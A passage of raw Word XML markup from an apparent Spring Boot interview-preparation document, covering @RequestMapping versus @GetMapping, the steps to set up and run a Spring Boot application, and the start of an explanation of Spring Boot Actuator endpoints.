    <w:p w14:paraId="5C3A22C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D53F8D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97E28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F0DC8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084"/>
        <w:gridCol w:w="3871"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="14749673" w14:textId="77777777" w:rsidTr="00271F15">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E48F18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5F666A4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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77084CBB"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GetMapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="57F1D4FC" w14:textId="77777777" w:rsidTr="00271F15">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57BC7EA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75530A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l-purpose (supports all HTTP methods)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DBE488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cally for HTTP GET requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="4874A023" w14:textId="77777777" w:rsidTr="00271F15">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7384B5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roduced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4529E25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early versions of Spring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72DDF7B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Spring 4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="5057DB89" w14:textId="77777777" w:rsidTr="00271F15">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D3040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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F2163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lexible, can handle any HTTP method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EFECE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alized for GET requests only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="4A57BA6D" w14:textId="77777777" w:rsidTr="00271F15">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="558DFAD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42DE30A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ires explicit method attribute if you want to restrict the HTTP method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60FC4E6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need for method specification, automatically for GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2297C39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38139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RequestMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need a more flexible approach that can handle multiple HTTP methods in the same method or need finer control over the request handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09551CA5" w14:textId="77777777" w:rsidR="00271F15" w:rsidRPr="00CE4B95" w:rsidRDefault="00271F15"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Us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for simplicity and clarity when handling HTTP GET requests. It is a more concise and readable alternative to @RequestMapping(method = RequestMethod.GET).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DEC56D" w14:textId="028AE33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601" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2626640D" w14:textId="12AD2E2F" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00433241">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="625" w:name="_Toc197867839"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If you have to create a Spring boot application? What steps will you follow</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="625"/>
    </w:p>
    <w:p w14:paraId="65C1B16F" w14:textId="22C2F613" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A"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a Spring Boot application, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0D97F"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Development Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B64C5B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JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure you have Java Development Kit (JDK) installed (preferably JDK 11 or later).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7402AD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an IDE</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use an IDE like IntelliJ IDEA, Eclipse, or Visual Studio Code for development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B445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Maven/Gradle</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Boot supports both Maven and Gradle for dependency management. Make sure you have one of them installed if not using the built-in IDE support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDFD69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Spring Boot Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937C23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Spring Boot application in several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2342C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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Online tool or directly in your IDE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C6857E"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Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId13"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74FC168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oose the following options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F823A4"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aven or Gradle (typically Maven)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7BF6DD"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anguage: Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA3D2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version: Choose the latest stable version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC9A65C"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etadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F000E7C"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oup: com.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103876A7"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tifact: springbootapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612CA2B5"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me: springbootapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086AE2E2"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ing: Jar (or War if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078EA583"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Version: Choose the version compatible with your JDK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067048E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encies: Select appropriate dependencies (e.g., Spring Web, Spring Data JPA, Thymeleaf, Spring Security, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAA06F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lick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and it will download a zip file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D8D511"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 the zip and open it in your IDE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3672C9A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IDE (IntelliJ IDEA or Eclipse)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE5199"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IntelliJ, you can directly create a Spring Boot project by selecting </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Initializr</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when creating a new project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D3D2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Eclipse, use </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Tool Suite (STS)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a Spring Boot project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA135C7"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application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C98D6F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application-specific properties like database connection, logging, server settings, etc., in src/main/resources/application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B294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application.properties):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EC671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293B70F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686A64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48BB99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0F5B51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3D55B3C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Main Application Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDE62F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pplications have a main class with the @SpringBootApplication annotation, which is the entry point for the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D873B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7FEB59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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5188124E" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C330EA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DC51D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E0D014D" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F7998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CCA810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pringbootappApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC3C17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03E255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pringbootappApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF6730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7AC7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90DBD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5. Create Controllers, Services, and Repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E12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Define the web layer, e.g., REST controllers or Thymeleaf controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1A6C2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Business logic layer (optional).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B4112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Data access layer (e.g., Spring Data JPA repositories).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7102B7B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troller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104FE5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controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641760E2" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FECBC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67FA2BC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36D8F5E" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D21AD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FFB12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4E04272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105E10C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03B587F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662CFB7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B913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53D337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Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EB94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ing on your project needs, add the required dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BC186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Web</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for building REST APIs or MVC applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0200904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for database interactions using JPA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAB55A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xml:space="preserve"> for building server-side HTML templates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A02809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or securing the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0B77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mbok</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reducing boilerplate code (optional).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE5B36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Maven dependencies in pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562174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C840D0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0F44C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716D41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51D314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9C2870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6C3596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F48DAC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18FD8D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2195BF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1E981D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62826D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hymeleaf&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D68113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0C68C9B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B0F327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10F05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384EE68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5EFC0E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9C7879A"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Implement Database Models (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A9EF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create model classes annotated with JPA annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104A194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5B755B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655F05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09659A9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19E76F1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5E9C901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75126B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47ECB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position;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4550E9F8" w14:textId="77777777" w:rsidR="00ED494A" w:rsidRPr="002C6305" w:rsidRDefault="00ED494A" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2C9F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6EF7AC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46854E"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8. Run the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874C6B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un the application by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F86254"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the IDE</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Run the main() method of the @SpringBootApplication class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE0F00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Command Line</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Run mvn spring-boot:run or ./mvnw spring-boot:run if you're using Maven, or ./gradlew bootRun for Gradle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09662421"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E84C4B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endpoints using Postman or any API testing tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367B088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the REST API, for example: http://localhost:8080/hello.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290211E9"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Build and Deploy (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F75D15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uild</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Package the application into a JAR file by running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ECCB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183C402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loy</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Deploy the JAR file to a server (e.g., AWS, Azure, Heroku) or run it locally with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A756C0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springbootapp-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BE6FA2" w14:textId="77777777" w:rsidR="00ED494A"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B4DBA">
          <v:rect id="_x0000_i2602" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CD75F0"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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46325B1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development environment (JDK, IDE, Maven/Gradle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DD78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 Boot application using Spring Initializr or IDE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F672C2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 settings (application.properties).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0415364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necessary Java classes for controllers, services, and repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCFE3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dependencies in pom.xml or build.gradle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E46A9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models (if needed) and configure database connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D48D9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un the application using your IDE or command line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4049CCA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and deploy if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3DE05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basic workflow for creating a Spring Boot application from scratch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298B804" w14:textId="40D7A1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603" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C97005" w14:textId="4A0470CD" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00433241">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="626" w:name="_Toc197867840"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Actuators in spring boot applications</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="626"/>
    </w:p>
    <w:p w14:paraId="5197FB6C" w14:textId="3B0B174E"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Actuators</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Features of Spring Boot Actuator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B9DE5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Actuators expose health information, such as database connection health, disk space, and other custom health indicators. This helps in checking if the application is running as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05946C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Provides metrics like the number of requests, response times, memory usage, active threads, etc. This helps in tracking the performance and resource consumption of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A06E4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 Info</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exposes details about the application, such as version, build time, and other metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65824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dit Events</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tracks events related to the application, such as authentication, authorization, and other important application-level events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527200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gging</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows you to manage logging levels in your application dynamically via HTTP endpoints, which is useful for troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A861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read Dump</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exposes a thread dump endpoint to analyze the threads running in the application, useful for debugging issues like thread blocking or deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620C6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 Information</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides information about the environment properties, such as system properties, configuration properties, and environment variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326967C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ndpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can also create custom actuator endpoints to expose application-specific metrics or operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BEA31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Enable Actuators in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C82A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nable Spring Boot Actuator, add the following dependency to your pom.xml (if you're using Maven):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4117E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3FF5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8ADB8E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ctuator&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9A816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1633B4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 if using Gradle, add this dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E73F5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ation 'org.springframework.boot:spring-boot-starter-actuator'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70748C0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ly Used Endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422D73B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lth</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
